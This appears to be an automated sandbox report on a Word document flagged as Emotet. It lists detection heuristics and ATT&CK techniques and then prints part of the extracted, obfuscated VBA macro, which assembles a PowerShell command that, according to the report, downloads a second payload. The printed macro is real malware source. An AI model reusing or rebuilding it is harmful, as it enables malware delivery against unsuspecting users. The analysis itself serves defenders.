Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with a signature indicating Emotet. Static analysis reveals the presence of a VBA macro with an AutoOpen function, which is a common Emotet delivery mechanism. The macro contains a Shell() call and attempts to construct and execute a PowerShell command, likely to download and run a secondary payload.
Heuristics (7)
- ClamAV: Doc.Malware.Emotet-6874849-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emotet-6874849-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11557 bytes |

SHA-256: 65f1e451374506ca9627bd4e612046139005d9e6254319f3281e78e0ad71a2d8

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "PDZSnjAlWarDk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dRThTYqLGaQT"
Function kUIjAdLmpA()
On Error Resume Next
GQJVVz = 74633
YvYUJc = CByte(vaimPU)
TjmSF = 87736
piWFV = CDate(raEHAv + Sin(33983 + 88957) * 29751 * CInt(74612))
BvONfD = CDate(25906)
PbccKT = NHONG
WiuPAo = "OwerSHell [Str" + "iNG]::JOin(" + " '' ,(" + "'18C87Y124" + "!70"
DHDEzZ = 60773
ZjHjc = CByte(QclcfL)
crzQiS = 19551
RIwoVo = CDate(IXXdkn + Sin(99777 + 76294) * 52226 * CInt(13063))
sNadT = CDate(94154)
iaDHAq = iqLtca
YsSmWaXKvUz = "C67C64!1" + "19a22" + "C11G22r88C83r65" + "-2" + "7G8" + "9{84{92" + "Y83G85G66" + "-22r68Y87" + "r88{8"
DHENzu = 45889
EmUvo = CByte(kKIIO)
IQCmcF = 64675
CXtnXr = CDate(vDnrf + Sin(19811 + 65654) * 12395 * CInt(13514))
wSOvzw = CDate(15443)
isGHm = ZEWol
TjioQLQ = "2!89G91a13G18a6" + "5a7" + "0G125{122r66" + "C119C22r11C2" + "2{88r83Y65C" + "27z89W8"
jYwzpG = 40139
idQLH = CByte(SEBoPO)
NnLzcp = 90983
oticY = CDate(cGvHR + Sin(62092 + 76162) * 16933 * CInt(41678))
jBClC = CDate(90098)
YZlVzz = npTawW
waPOWDwvVWj = "4W92C" + "83W" + "85G66G22C" + "101{79G69a6" + "6r83!91W24Y12" + "0C83C66r24r97" + "{83-" + "84Y" + "117" + "G90!9"
muKLJu = 42983
aKOIiL = CByte(ZZrIu)
HArPld = 64183
pjjzk = CDate(qKmoqR + Sin(11332 + 84869) * 30362 * CInt(66246))
FnfkBt = CDate(58851)
PCWmY = jBzhGf
pLRpQtCtWO = "5G83Y88z" + "66{13z18r95" + "G97a103Y92{125" + "-98r22a" + "11C22" + "!17r94C" + "66{66C70{" + "12G25C25-" + "65"
kUIjAdLmpA = WiuPAo + YsSmWaXKvUz + TjioQLQ + waPOWDwvVWj + pLRpQtCtWO
End Function
Function jSzbDhZE()
On Error Resume Next
tYaOm = 5210
chNXz = CByte(mrIiR)
qjbWc = 5093
pZqHlB = CDate(VdvXl + Sin(66533 + 27033) * 47480 * CInt(35374))
AwkFjf = CDate(21204)
jhGVJ = hTijNI
JosWDu = "r65z65z2" + "4{9" + "5r66C91z85C9" + "0-" + "95!88" + "z95W85-" + "24C" + "68-67" + "z25z116r"
GlwQRN = 24007
fMmXS = CByte(AzELfq)
ZECHWV = 198
nJMlW = CDate(MzlpEw + Sin(44023 + 43152) * 77428 * CInt(42654))
nDUqM = CDate(20441)
pqjpmX = wMhTi
wrwFtahur = "84W" + "3C89Y25W11" + "8W94z66" + "r66-70G12a25-25" + "-65" + "G65z65a24C" + "87a85r85W89r67"
BqZDL = 28990
jTnwj = CByte(BWiPB)
wfoCzH = 81702
ztPzS = CDate(tnzHm + Sin(51546 + 15266) * 7032 * CInt(25182))
BoJutO = CDate(18436)
tUBCYi = rViwM
nmkwT = "Y88z66W95G88a" + "81z9" + "0a95W88r83-" + "24z95!88W80z"
njKfN = 43979
cafwb = CByte(AZNGr)
nzRTvi = 3245
DbwYIw = CDate(oFoqX + Sin(22148 + 21475) * 4406 * CInt(27806))
UYdkX = CDate(64754)
DAkavG = vHpWfK
jJAuzH = "89Y25" + "!123{" + "1{1" + "21{122r25!118{" + "94a66!66a70W1" + "2{25!25{65W"
BFcuk = 42492
fGRJij = CByte(zVHVW)
TwsSK = 72008
urHjt = CDate(wfwAVF + Sin(21924 + 53786) * 66703 * CInt(8457))
BHAJvs = CDate(7267)
bPPAv = aHYVu
wzuiulbA = "65W65W24{85" + "r83G88!66{" + "67G6" + "8{79z90W87{65W2"
KapzY = 33974
GzRSZ = CByte(voUcn)
kdwTnU = 82456
afBcm = CDate(qTtvm + Sin(31356 + 82930) * 67527 * CInt(47229))
wfhcV = CDate(23400)
aqFwW = iiQim
sJhos = "4r64Y79!6" + "7a82r67!2" + "4{66" + "Y83z85r94W25" + "!94{8" + "5a122" + "W91C67C2"
EWiRiE = 4331
iMwpaZ = CByte(lPQhR)
CiVmw = 29519
wSdWs = CDate(ADLoNR + Sin(12584 + 72763) * 92675 * CInt(8157))
XMIOD = CDate(67543)
wMKXMD = mYrhK
IXkbm = "5Y" + "118!9" + "4-66W" + "66a70a12-25" + "{25Y6Y3{5"
jSzbDhZE = JosWDu + wrwFtahur + nmkwT + jJAuzH + wzuiulbA + sJhos + IXkbm
End Function
Function worEFlZJ()
On Error Resume Next
aztYCa = 52295
QLObH = CByte(RqYskO)
JlpTV = 82968
ivUpjV = CDate(zTmUl + Sin(55292 + 39277) * 42249 * CInt(25817))
jToTt = CDate(79402)
FCuloz = LAcqdF
StBIwz = "z4Y82{88W87z" + "24" + "!85z89{91" + "z25Y71r110W92z" + "119z25a11" + "8r94z66!66" + "r70{12" + "G25r25r6" + "5W65{65" + "Y24{9"
umTRX = 73092
zmlNF = CByte(NquAu)
vJEMw = 97894
LAnAAW = CDate(LPaTQ + Sin(22257 + 40977) * 23774 * CInt(27648))
aijsQ
... (truncated)